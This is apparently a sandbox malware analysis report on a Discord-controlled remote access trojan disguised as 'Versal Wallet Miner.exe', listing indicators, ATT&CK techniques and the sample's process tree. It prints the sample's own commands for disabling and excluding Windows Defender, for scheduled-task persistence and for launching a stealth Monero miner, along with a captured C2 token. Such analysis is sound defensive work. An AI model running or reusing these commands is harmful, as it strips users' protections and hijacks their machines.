discordrat | cada552cf5b6543a9912f10595dd2f0e09439aae82807ab5c89c0530f709ebe1

Analysis

max time kernel
1048s
max time network
1042s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 23:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Versal Wallet Miner.exe
Size

17.3MB
MD5

f14fd88ea6e9a20ee19a040258131eb0
SHA1

b9fcbc22750fc71d4e0d77bee73f983dd60c15df
SHA256

cada552cf5b6543a9912f10595dd2f0e09439aae82807ab5c89c0530f709ebe1
SHA512

c48446c60a2c3d895d13392a45949e572efdc9c61bce4bc1286c6cf1aabd5668d92d1a1f3c3a8e1dd247db943b562cf29f1854bf6774034d365dd80a067ce412
SSDEEP

393216:lqbrPQ+neovbHYi5P2LQHi9yAf6x0/u0cQzZo/0sH5JnivJM0tH:4brY+eo4i5PuQHi4L0/uiCPZJAa0

Score

10^/10

discordrat collection credential_access defense_evasion discovery execution persistence privilege_escalation pyinstaller rat rootkit spyware stealer upx

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTMwODc0NzE1MTI1MzE4MDU2OA.GbxO_D._a3OsoX5ZAA2u6bHkqnYVm1ylz4DH0RyRqIHUA
server_id
1308746945250066522

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Discordrat family
discordrat

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3600	powershell.exe
972	powershell.exe
4744	powershell.exe
3084	powershell.exe
3712	powershell.exe
736	powershell.exe
3512	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	Versal Wallet Miner.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2360	cmd.exe
3092	powershell.exe

Executes dropped EXE 9 IoCs

pid	Process
2400	tk.exe
2032	bind.exe
1836	Built.exe
3920	Client-built.exe
1484	Built.exe
2460	tk.exe
4116	rar.exe
1764	services64.exe
4508	sihost64.exe

Loads dropped DLL 26 IoCs

pid	Process
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
2460	tk.exe
2460	tk.exe
2460	tk.exe
2460	tk.exe
2460	tk.exe
2460	tk.exe
2460	tk.exe
2460	tk.exe
2460	tk.exe
2460	tk.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe
1484	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
62	discord.com
63	discord.com
67	discord.com
17	discord.com
23	discord.com
44	discord.com
45	discord.com
48	discord.com
68	discord.com
18	discord.com
47	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com
42	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1108	tasklist.exe
4956	tasklist.exe
1536	tasklist.exe
1608	tasklist.exe
4928	tasklist.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4572 set thread context of 4708	4572	conhost.exe	231

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1484-419-0x00007FFA6E6A0000-0x00007FFA6EB0A000-memory.dmp	upx
behavioral2/files/0x0007000000023d93-337.dat	upx
behavioral2/files/0x0007000000023d72-633.dat	upx
behavioral2/memory/1484-670-0x00007FFA80BF0000-0x00007FFA80BFF000-memory.dmp	upx
behavioral2/memory/1484-669-0x00007FFA7CD80000-0x00007FFA7CDA4000-memory.dmp	upx
behavioral2/files/0x0007000000023d7f-652.dat	upx
behavioral2/files/0x0007000000023d7c-651.dat	upx
behavioral2/files/0x0007000000023d79-650.dat	upx
behavioral2/files/0x0007000000023d77-649.dat	upx
behavioral2/files/0x0007000000023d76-648.dat	upx
behavioral2/files/0x0007000000023d74-647.dat	upx
behavioral2/files/0x0007000000023d73-646.dat	upx
behavioral2/files/0x0007000000023d71-645.dat	upx
behavioral2/files/0x0007000000023d9c-644.dat	upx
behavioral2/files/0x0007000000023d9b-643.dat	upx
behavioral2/files/0x0007000000023d9a-642.dat	upx
behavioral2/files/0x0007000000023d92-639.dat	upx
behavioral2/files/0x0007000000023d90-638.dat	upx
behavioral2/files/0x0007000000023d91-636.dat	upx
behavioral2/memory/1484-1125-0x00007FFA6C2F0000-0x00007FFA6C45D000-memory.dmp	upx
behavioral2/memory/1484-1123-0x00007FFA80450000-0x00007FFA80469000-memory.dmp	upx
behavioral2/memory/1484-1122-0x00007FFA80470000-0x00007FFA8049C000-memory.dmp	upx
behavioral2/memory/1484-1132-0x00007FFA6BE40000-0x00007FFA6BEF6000-memory.dmp	upx
behavioral2/memory/1484-1131-0x00007FFA6B660000-0x00007FFA6B9D4000-memory.dmp	upx
behavioral2/memory/1484-1130-0x00007FFA77E50000-0x00007FFA77E7E000-memory.dmp	upx
behavioral2/memory/1484-1129-0x00007FFA88CD0000-0x00007FFA88CDD000-memory.dmp	upx
behavioral2/memory/1484-1134-0x00007FFA76F00000-0x00007FFA76F15000-memory.dmp	upx
behavioral2/memory/1484-1136-0x00007FFA809C0000-0x00007FFA809CD000-memory.dmp	upx
behavioral2/memory/1484-1135-0x00007FFA6E6A0000-0x00007FFA6EB0A000-memory.dmp	upx
behavioral2/memory/1484-1137-0x00007FFA7CD80000-0x00007FFA7CDA4000-memory.dmp	upx
behavioral2/memory/1484-1138-0x00007FFA6B540000-0x00007FFA6B658000-memory.dmp	upx
behavioral2/memory/1484-1128-0x00007FFA77E80000-0x00007FFA77E99000-memory.dmp	upx
behavioral2/memory/1484-1124-0x00007FFA80390000-0x00007FFA803AE000-memory.dmp	upx
behavioral2/memory/1484-1279-0x00007FFA77E50000-0x00007FFA77E7E000-memory.dmp	upx
behavioral2/memory/1484-1284-0x00007FFA6B540000-0x00007FFA6B658000-memory.dmp	upx
behavioral2/memory/1484-1281-0x00007FFA6BE40000-0x00007FFA6BEF6000-memory.dmp	upx
behavioral2/memory/1484-1270-0x00007FFA6E6A0000-0x00007FFA6EB0A000-memory.dmp	upx
behavioral2/memory/1484-1277-0x00007FFA77E80000-0x00007FFA77E99000-memory.dmp	upx
behavioral2/memory/1484-1280-0x00007FFA6B660000-0x00007FFA6B9D4000-memory.dmp	upx
behavioral2/memory/1484-1368-0x00007FFA6C2F0000-0x00007FFA6C45D000-memory.dmp	upx
behavioral2/memory/1484-1362-0x00007FFA6E6A0000-0x00007FFA6EB0A000-memory.dmp	upx
behavioral2/memory/1484-1367-0x00007FFA80390000-0x00007FFA803AE000-memory.dmp	upx
behavioral2/memory/1484-1363-0x00007FFA7CD80000-0x00007FFA7CDA4000-memory.dmp	upx
behavioral2/memory/1484-1390-0x00007FFA76F00000-0x00007FFA76F15000-memory.dmp	upx
behavioral2/memory/1484-1393-0x00007FFA80470000-0x00007FFA8049C000-memory.dmp	upx
behavioral2/memory/1484-1392-0x00007FFA6B540000-0x00007FFA6B658000-memory.dmp	upx
behavioral2/memory/1484-1391-0x00007FFA809C0000-0x00007FFA809CD000-memory.dmp	upx
behavioral2/memory/1484-1389-0x00007FFA6BE40000-0x00007FFA6BEF6000-memory.dmp	upx
behavioral2/memory/1484-1388-0x00007FFA6B660000-0x00007FFA6B9D4000-memory.dmp	upx
behavioral2/memory/1484-1387-0x00007FFA77E50000-0x00007FFA77E7E000-memory.dmp	upx
behavioral2/memory/1484-1386-0x00007FFA88CD0000-0x00007FFA88CDD000-memory.dmp	upx
behavioral2/memory/1484-1385-0x00007FFA77E80000-0x00007FFA77E99000-memory.dmp	upx
behavioral2/memory/1484-1384-0x00007FFA6C2F0000-0x00007FFA6C45D000-memory.dmp	upx
behavioral2/memory/1484-1383-0x00007FFA80390000-0x00007FFA803AE000-memory.dmp	upx
behavioral2/memory/1484-1382-0x00007FFA80450000-0x00007FFA80469000-memory.dmp	upx
behavioral2/memory/1484-1380-0x00007FFA80BF0000-0x00007FFA80BFF000-memory.dmp	upx
behavioral2/memory/1484-1379-0x00007FFA7CD80000-0x00007FFA7CDA4000-memory.dmp	upx
behavioral2/memory/1484-1378-0x00007FFA6E6A0000-0x00007FFA6EB0A000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0008000000023ccd-4.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Versal Wallet Miner.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2956	cmd.exe
2080	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3824	WMIC.exe
2868	WMIC.exe
3068	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1020	systeminfo.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3412	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4936	powershell.exe
4936	powershell.exe
3600	powershell.exe
3600	powershell.exe
3512	powershell.exe
3512	powershell.exe
3600	powershell.exe
3512	powershell.exe
3092	powershell.exe
3092	powershell.exe
64	powershell.exe
64	powershell.exe
3092	powershell.exe
64	powershell.exe
972	powershell.exe
972	powershell.exe
972	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
1532	conhost.exe
4744	powershell.exe
4744	powershell.exe
3084	powershell.exe
3084	powershell.exe
4572	conhost.exe
4572	conhost.exe
3712	powershell.exe
3712	powershell.exe
736	powershell.exe
736	powershell.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe
4708	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3920	Client-built.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeIncreaseQuotaPrivilege	2844	WMIC.exe
Token: SeSecurityPrivilege	2844	WMIC.exe
Token: SeTakeOwnershipPrivilege	2844	WMIC.exe
Token: SeLoadDriverPrivilege	2844	WMIC.exe
Token: SeSystemProfilePrivilege	2844	WMIC.exe
Token: SeSystemtimePrivilege	2844	WMIC.exe
Token: SeProfSingleProcessPrivilege	2844	WMIC.exe
Token: SeIncBasePriorityPrivilege	2844	WMIC.exe
Token: SeCreatePagefilePrivilege	2844	WMIC.exe
Token: SeBackupPrivilege	2844	WMIC.exe
Token: SeRestorePrivilege	2844	WMIC.exe
Token: SeShutdownPrivilege	2844	WMIC.exe
Token: SeDebugPrivilege	2844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2844	WMIC.exe
Token: SeRemoteShutdownPrivilege	2844	WMIC.exe
Token: SeUndockPrivilege	2844	WMIC.exe
Token: SeManageVolumePrivilege	2844	WMIC.exe
Token: 33	2844	WMIC.exe
Token: 34	2844	WMIC.exe
Token: 35	2844	WMIC.exe
Token: 36	2844	WMIC.exe
Token: SeDebugPrivilege	1108	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2844	WMIC.exe
Token: SeSecurityPrivilege	2844	WMIC.exe
Token: SeTakeOwnershipPrivilege	2844	WMIC.exe
Token: SeLoadDriverPrivilege	2844	WMIC.exe
Token: SeSystemProfilePrivilege	2844	WMIC.exe
Token: SeSystemtimePrivilege	2844	WMIC.exe
Token: SeProfSingleProcessPrivilege	2844	WMIC.exe
Token: SeIncBasePriorityPrivilege	2844	WMIC.exe
Token: SeCreatePagefilePrivilege	2844	WMIC.exe
Token: SeBackupPrivilege	2844	WMIC.exe
Token: SeRestorePrivilege	2844	WMIC.exe
Token: SeShutdownPrivilege	2844	WMIC.exe
Token: SeDebugPrivilege	2844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2844	WMIC.exe
Token: SeRemoteShutdownPrivilege	2844	WMIC.exe
Token: SeUndockPrivilege	2844	WMIC.exe
Token: SeManageVolumePrivilege	2844	WMIC.exe
Token: 33	2844	WMIC.exe
Token: 34	2844	WMIC.exe
Token: 35	2844	WMIC.exe
Token: 36	2844	WMIC.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeIncreaseQuotaPrivilege	3824	WMIC.exe
Token: SeSecurityPrivilege	3824	WMIC.exe
Token: SeTakeOwnershipPrivilege	3824	WMIC.exe
Token: SeLoadDriverPrivilege	3824	WMIC.exe
Token: SeSystemProfilePrivilege	3824	WMIC.exe
Token: SeSystemtimePrivilege	3824	WMIC.exe
Token: SeProfSingleProcessPrivilege	3824	WMIC.exe
Token: SeIncBasePriorityPrivilege	3824	WMIC.exe
Token: SeCreatePagefilePrivilege	3824	WMIC.exe
Token: SeBackupPrivilege	3824	WMIC.exe
Token: SeRestorePrivilege	3824	WMIC.exe
Token: SeShutdownPrivilege	3824	WMIC.exe
Token: SeDebugPrivilege	3824	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3824	WMIC.exe
Token: SeRemoteShutdownPrivilege	3824	WMIC.exe
Token: SeUndockPrivilege	3824	WMIC.exe
Token: SeManageVolumePrivilege	3824	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4420 wrote to memory of 4936	4420	Versal Wallet Miner.exe	83
PID 4420 wrote to memory of 4936	4420	Versal Wallet Miner.exe	83
PID 4420 wrote to memory of 4936	4420	Versal Wallet Miner.exe	83
PID 4420 wrote to memory of 2400	4420	Versal Wallet Miner.exe	85
PID 4420 wrote to memory of 2400	4420	Versal Wallet Miner.exe	85
PID 4420 wrote to memory of 2032	4420	Versal Wallet Miner.exe	86
PID 4420 wrote to memory of 2032	4420	Versal Wallet Miner.exe	86
PID 4420 wrote to memory of 1836	4420	Versal Wallet Miner.exe	87
PID 4420 wrote to memory of 1836	4420	Versal Wallet Miner.exe	87
PID 4420 wrote to memory of 3920	4420	Versal Wallet Miner.exe	88
PID 4420 wrote to memory of 3920	4420	Versal Wallet Miner.exe	88
PID 1836 wrote to memory of 1484	1836	Built.exe	89
PID 1836 wrote to memory of 1484	1836	Built.exe	89
PID 2400 wrote to memory of 2460	2400	tk.exe	90
PID 2400 wrote to memory of 2460	2400	tk.exe	90
PID 1484 wrote to memory of 3380	1484	Built.exe	97
PID 1484 wrote to memory of 3380	1484	Built.exe	97
PID 1484 wrote to memory of 3348	1484	Built.exe	98
PID 1484 wrote to memory of 3348	1484	Built.exe	98
PID 1484 wrote to memory of 4432	1484	Built.exe	99
PID 1484 wrote to memory of 4432	1484	Built.exe	99
PID 1484 wrote to memory of 2692	1484	Built.exe	103
PID 1484 wrote to memory of 2692	1484	Built.exe	103
PID 2692 wrote to memory of 2844	2692	cmd.exe	105
PID 2692 wrote to memory of 2844	2692	cmd.exe	105
PID 4432 wrote to memory of 1108	4432	cmd.exe	106
PID 4432 wrote to memory of 1108	4432	cmd.exe	106
PID 3380 wrote to memory of 3512	3380	cmd.exe	107
PID 3380 wrote to memory of 3512	3380	cmd.exe	107
PID 3348 wrote to memory of 3600	3348	cmd.exe	108
PID 3348 wrote to memory of 3600	3348	cmd.exe	108
PID 1484 wrote to memory of 2168	1484	Built.exe	111
PID 1484 wrote to memory of 2168	1484	Built.exe	111
PID 2168 wrote to memory of 3724	2168	cmd.exe	113
PID 2168 wrote to memory of 3724	2168	cmd.exe	113
PID 1484 wrote to memory of 812	1484	Built.exe	144
PID 1484 wrote to memory of 812	1484	Built.exe	144
PID 812 wrote to memory of 860	812	cmd.exe	169
PID 812 wrote to memory of 860	812	cmd.exe	169
PID 1484 wrote to memory of 4672	1484	Built.exe	117
PID 1484 wrote to memory of 4672	1484	Built.exe	117
PID 4672 wrote to memory of 3824	4672	cmd.exe	119
PID 4672 wrote to memory of 3824	4672	cmd.exe	119
PID 1484 wrote to memory of 3312	1484	Built.exe	120
PID 1484 wrote to memory of 3312	1484	Built.exe	120
PID 3312 wrote to memory of 2868	3312	cmd.exe	122
PID 3312 wrote to memory of 2868	3312	cmd.exe	122
PID 1484 wrote to memory of 816	1484	Built.exe	123
PID 1484 wrote to memory of 816	1484	Built.exe	123
PID 1484 wrote to memory of 220	1484	Built.exe	125
PID 1484 wrote to memory of 220	1484	Built.exe	125
PID 1484 wrote to memory of 4560	1484	Built.exe	127
PID 1484 wrote to memory of 4560	1484	Built.exe	127
PID 1484 wrote to memory of 2360	1484	Built.exe	129
PID 1484 wrote to memory of 2360	1484	Built.exe	129
PID 1484 wrote to memory of 1468	1484	Built.exe	130
PID 1484 wrote to memory of 1468	1484	Built.exe	130
PID 816 wrote to memory of 4956	816	cmd.exe	132
PID 816 wrote to memory of 4956	816	cmd.exe	132
PID 1484 wrote to memory of 4576	1484	Built.exe	133
PID 1484 wrote to memory of 4576	1484	Built.exe	133
PID 1484 wrote to memory of 2956	1484	Built.exe	135
PID 1484 wrote to memory of 2956	1484	Built.exe	135
PID 220 wrote to memory of 1536	220	cmd.exe	137

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
976	attrib.exe
2448	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Versal Wallet Miner.exe
"C:\Users\Admin\AppData\Local\Temp\Versal Wallet Miner.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4420
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAZAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAeAB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZABiACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4936
- C:\Users\Admin\AppData\Local\Temp\tk.exe
  "C:\Users\Admin\AppData\Local\Temp\tk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Users\Admin\AppData\Local\Temp\tk.exe
    "C:\Users\Admin\AppData\Local\Temp\tk.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2460
- C:\Users\Admin\AppData\Local\Temp\bind.exe
  "C:\Users\Admin\AppData\Local\Temp\bind.exe"
  2⤵
  - Executes dropped EXE
  PID:2032
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bind.exe"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1532
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      PID:4296
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4744
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3084
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
      4⤵
      PID:1892
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3412
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Windows\system32\services64.exe"
      4⤵
      PID:3348
    - - C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        5⤵
        Executes dropped EXE
        
        PID:1764
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        6⤵
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4572
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        
        PID:1928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:736
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:4508
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:3932
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=49mcUhqGy1aYh97ZuXQ4DJbpCct5gy1YX7Cpi8NQP5bDepWiw8PhjSyAmBhyLCo4CCfw5WmqMjLJ6VUiLi9NtPUwMmFVyNV --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4708
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1836
- - C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3348
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4432
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2692
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2168
    - - C:\Windows\system32\reg.exe
        
